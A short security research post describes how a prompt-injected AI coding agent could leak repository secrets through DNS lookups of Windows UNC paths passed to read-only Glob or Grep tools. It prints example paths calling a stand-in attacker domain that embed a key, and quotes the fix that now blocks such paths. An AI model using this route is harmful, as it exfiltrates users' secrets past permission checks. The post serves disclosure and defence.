What if a prompt-injected agent could use safe read only tools to silently exfiltrate your secrets?


Data exfiltration from AI coding agents is a well-documented attack class. Johann Rehberger (embracethered) has published extensively on this topic:

After the Claude Code source was leaked, I found an interesting condition: UNC path checks across its tools and permission system. I started to think this was an interesting attack vector. If such a bug exists, it could be used for data exfiltration via DNS resolution.

UNC Path DNS Exfiltration

On Windows, when any program accesses a UNC path like:

\\\\SOMETHING.attacker.com\share

the OS performs a DNS lookup for SOMETHING.attacker.com. The attacker controls the authoritative DNS server for attacker.com and logs every query. In that way, a malicious agent can exfiltrate repository secrets to a third party without access to any Bash tool.

In Claude Code we can use a Glob or Grep tool, which under the hood uses ripgrep. The tool will accept a pattern and a file path such as:

\\AKIA3EXAMPLE.attacker.com\share

Windows resolves AKIA3EXAMPLE.attacker.com. The attacker’s DNS server logs the query. No file needs to exist, and no connection needs to succeed. The DNS resolution alone leaks the data.

Currently, this is fixed in Claude Code with this condition:

// Block UNC paths before any filesystem access to prevent network
// requests (DNS/SMB) during validation on Windows
if (filePath.startsWith('//') || filePath.startsWith('\\\\')) {
    return {resolvedPath: filePath, isSymlink: false, isCanonical: false}
}

But what about other agents?…